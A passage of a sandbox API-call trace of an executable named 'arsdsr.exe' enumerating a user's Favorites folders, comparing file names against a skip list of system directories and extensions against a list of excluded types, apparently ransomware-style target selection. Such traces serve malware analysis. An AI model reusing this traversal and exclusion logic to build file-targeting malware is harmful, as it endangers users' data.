ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0134.402] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0134.402] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0134.402] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0134.402] lstrcmpiW (lpString1="MSN Autos.url", lpString2=".") returned 1 [0134.402] lstrcmpiW (lpString1="MSN Autos.url", lpString2="..") returned 1 [0134.402] lstrcmpiW (lpString1="MSN Autos.url", lpString2="...") returned 1 [0134.402] lstrcmpiW (lpString1="MSN Autos.url", lpString2="windows") returned -1 [0134.402] lstrcmpiW (lpString1="MSN Autos.url", lpString2="$recycle.bin") returned 1 [0134.402] lstrcmpiW (lpString1="MSN Autos.url", lpString2="rsa") returned -1 [0134.403] lstrcmpiW (lpString1="MSN Autos.url", lpString2="ntuser.dat") returned -1 [0134.403] lstrcmpiW (lpString1="MSN Autos.url", lpString2="programdata") returned -1 [0134.403] lstrcmpiW (lpString1="MSN Autos.url", lpString2="appdata") returned 1 [0134.403] lstrcmpiW (lpString1="MSN Autos.url", lpString2="program files") returned -1 [0134.403] lstrcmpiW (lpString1="MSN Autos.url", lpString2="program files (x86)") returned -1 [0134.403] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0134.403] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN Autos.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" [0134.403] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.403] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.403] PathFindExtensionW (pszPath="MSN Autos.url") returned=".url" [0134.403] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.403] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.403] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.403] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.403] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.403] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.403] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.403] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.403] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.403] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0134.403] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2=".") returned 1 [0134.403] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="..") returned 1 [0134.403] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="...") returned 1 [0134.403] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="windows") returned -1 [0134.403] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="$recycle.bin") returned 1 [0134.403] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="rsa") returned -1 [0134.403] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="ntuser.dat") returned -1 [0134.403] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="programdata") returned -1 [0134.403] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="appdata") returned 1 [0134.403] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="program files") returned -1 [0134.403] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="program files (x86)") returned -1 [0134.403] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0134.403] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN Entertainment.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" [0134.403] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.404] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.404] PathFindExtensionW (pszPath="MSN Entertainment.url") returned=".url" [0134.404] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.404] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.404] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.404] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.404] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.404] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.404] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.404] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.404] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.404] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0134.404] lstrcmpiW (lpString1="MSN Money.url", lpString2=".") returned 1 [0134.404] lstrcmpiW (lpString1="MSN Money.url", lpString2="..") returned 1 [0134.404] lstrcmpiW (lpString1="MSN Money.url", lpString2="...") returned 1 [0134.404] lstrcmpiW (lpString1="MSN Money.url", lpString2="windows") returned -1 [0134.404] lstrcmpiW (lpString1="MSN Money.url", lpString2="$recycle.bin") returned 1 [0134.404] lstrcmpiW (lpString1="MSN Money.url", lpString2="rsa") returned -1 [0134.404] lstrcmpiW (lpString1="MSN Money.url", lpString2="ntuser.dat") returned -1 [0134.404] lstrcmpiW (lpString1="MSN Money.url", lpString2="programdata") returned -1 [0134.404] lstrcmpiW (lpString1="MSN Money.url", lpString2="appdata") returned 1 [0134.404] lstrcmpiW (lpString1="MSN Money.url", lpString2="program files") returned -1 [0134.404] lstrcmpiW (lpString1="MSN Money.url", lpString2="program files (x86)") returned -1 [0134.404] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0134.404] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN Money.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" [0134.404] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.404] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.404] PathFindExtensionW (pszPath="MSN Money.url") returned=".url" [0134.404] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.404] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.404] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.404] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.404] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.405] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.405] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.405] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.405] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.405] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0134.405] lstrcmpiW (lpString1="MSN Sports.url", lpString2=".") returned 1 [0134.405] lstrcmpiW (lpString1="MSN Sports.url", lpString2="..") returned 1 [0134.405] lstrcmpiW (lpString1="MSN Sports.url", lpString2="...") returned 1 [0134.405] lstrcmpiW (lpString1="MSN Sports.url", lpString2="windows") returned -1 [0134.405] lstrcmpiW (lpString1="MSN Sports.url", lpString2="$recycle.bin") returned 1 [0134.405] lstrcmpiW (lpString1="MSN Sports.url", lpString2="rsa") returned -1 [0134.405] lstrcmpiW (lpString1="MSN Sports.url", lpString2="ntuser.dat") returned -1 [0134.405] lstrcmpiW (lpString1="MSN Sports.url", lpString2="programdata") returned -1 [0134.405] lstrcmpiW (lpString1="MSN Sports.url", lpString2="appdata") returned 1 [0134.405] lstrcmpiW (lpString1="MSN Sports.url", lpString2="program files") returned -1 [0134.405] lstrcmpiW (lpString1="MSN Sports.url", lpString2="program files (x86)") returned -1 [0134.405] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0134.405] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN Sports.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" [0134.405] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.405] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.405] PathFindExtensionW (pszPath="MSN Sports.url") returned=".url" [0134.405] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.405] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.405] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.405] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.405] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.405] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.405] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.405] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.405] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.405] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0134.405] lstrcmpiW (lpString1="MSN.url", lpString2=".") returned 1 [0134.405] lstrcmpiW (lpString1="MSN.url", lpString2="..") returned 1 [0134.405] lstrcmpiW (lpString1="MSN.url", lpString2="...") returned 1 [0134.405] lstrcmpiW (lpString1="MSN.url", lpString2="windows") returned -1 [0134.406] lstrcmpiW (lpString1="MSN.url", lpString2="$recycle.bin") returned 1 [0134.406] lstrcmpiW (lpString1="MSN.url", lpString2="rsa") returned -1 [0134.406] lstrcmpiW (lpString1="MSN.url", lpString2="ntuser.dat") returned -1 [0134.406] lstrcmpiW (lpString1="MSN.url", lpString2="programdata") returned -1 [0134.406] lstrcmpiW (lpString1="MSN.url", lpString2="appdata") returned 1 [0134.406] lstrcmpiW (lpString1="MSN.url", lpString2="program files") returned -1 [0134.406] lstrcmpiW (lpString1="MSN.url", lpString2="program files (x86)") returned -1 [0134.406] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0134.406] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" [0134.406] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.406] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.406] PathFindExtensionW (pszPath="MSN.url") returned=".url" [0134.406] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.406] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.406] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.406] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.406] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.406] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.406] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.406] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.406] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.406] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0134.406] lstrcmpiW (lpString1="MSNBC News.url", lpString2=".") returned 1 [0134.406] lstrcmpiW (lpString1="MSNBC News.url", lpString2="..") returned 1 [0134.406] lstrcmpiW (lpString1="MSNBC News.url", lpString2="...") returned 1 [0134.406] lstrcmpiW (lpString1="MSNBC News.url", lpString2="windows") returned -1 [0134.406] lstrcmpiW (lpString1="MSNBC News.url", lpString2="$recycle.bin") returned 1 [0134.406] lstrcmpiW (lpString1="MSNBC News.url", lpString2="rsa") returned -1 [0134.406] lstrcmpiW (lpString1="MSNBC News.url", lpString2="ntuser.dat") returned -1 [0134.406] lstrcmpiW (lpString1="MSNBC News.url", lpString2="programdata") returned -1 [0134.406] lstrcmpiW (lpString1="MSNBC News.url", lpString2="appdata") returned 1 [0134.406] lstrcmpiW (lpString1="MSNBC News.url", lpString2="program files") returned -1 [0134.406] lstrcmpiW (lpString1="MSNBC News.url", lpString2="program files (x86)") returned -1 [0134.406] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0134.406] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSNBC News.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" [0134.407] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.407] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.407] PathFindExtensionW (pszPath="MSNBC News.url") returned=".url" [0134.407] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.407] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.407] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.407] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.407] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.407] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.407] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.407] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.407] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.407] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0134.407] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0134.408] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0134.408] lstrcmpiW (lpString1="Windows Live", lpString2=".") returned 1 [0134.408] lstrcmpiW (lpString1="Windows Live", lpString2="..") returned 1 [0134.408] lstrcmpiW (lpString1="Windows Live", lpString2="...") returned 1 [0134.408] lstrcmpiW (lpString1="Windows Live", lpString2="windows") returned 1 [0134.408] lstrcmpiW (lpString1="Windows Live", lpString2="$recycle.bin") returned 1 [0134.408] lstrcmpiW (lpString1="Windows Live", lpString2="rsa") returned 1 [0134.408] lstrcmpiW (lpString1="Windows Live", lpString2="ntuser.dat") returned 1 [0134.408] lstrcmpiW (lpString1="Windows Live", lpString2="programdata") returned 1 [0134.408] lstrcmpiW (lpString1="Windows Live", lpString2="appdata") returned 1 [0134.408] lstrcmpiW (lpString1="Windows Live", lpString2="program files") returned 1 [0134.408] lstrcmpiW (lpString1="Windows Live", lpString2="program files (x86)") returned 1 [0134.408] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0134.408] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Windows Live" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0134.408] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0134.408] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0134.408] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*" [0134.408] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0134.419] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0134.419] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0134.419] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0134.419] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0134.419] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0134.419] lstrcmpiW (lpString1="Get Windows Live.url", lpString2=".") returned 1 [0134.419] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="..") returned 1 [0134.419] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="...") returned 1 [0134.419] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="windows") returned -1 [0134.419] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="$recycle.bin") returned 1 [0134.419] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="rsa") returned -1 [0134.419] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="ntuser.dat") returned -1 [0134.419] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="programdata") returned -1 [0134.419] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="appdata") returned 1 [0134.419] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="program files") returned -1 [0134.419] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="program files (x86)") returned -1 [0134.419] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0134.419] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="Get Windows Live.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" [0134.419] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.419] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.419] PathFindExtensionW (pszPath="Get Windows Live.url") returned=".url" [0134.419] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.419] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.419] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.419] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.419] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.419] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.419] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.419] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.419] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.419] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2=".") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="..") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="...") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="windows") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="$recycle.bin") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="rsa") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="ntuser.dat") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="programdata") returned 1 [0134.420] 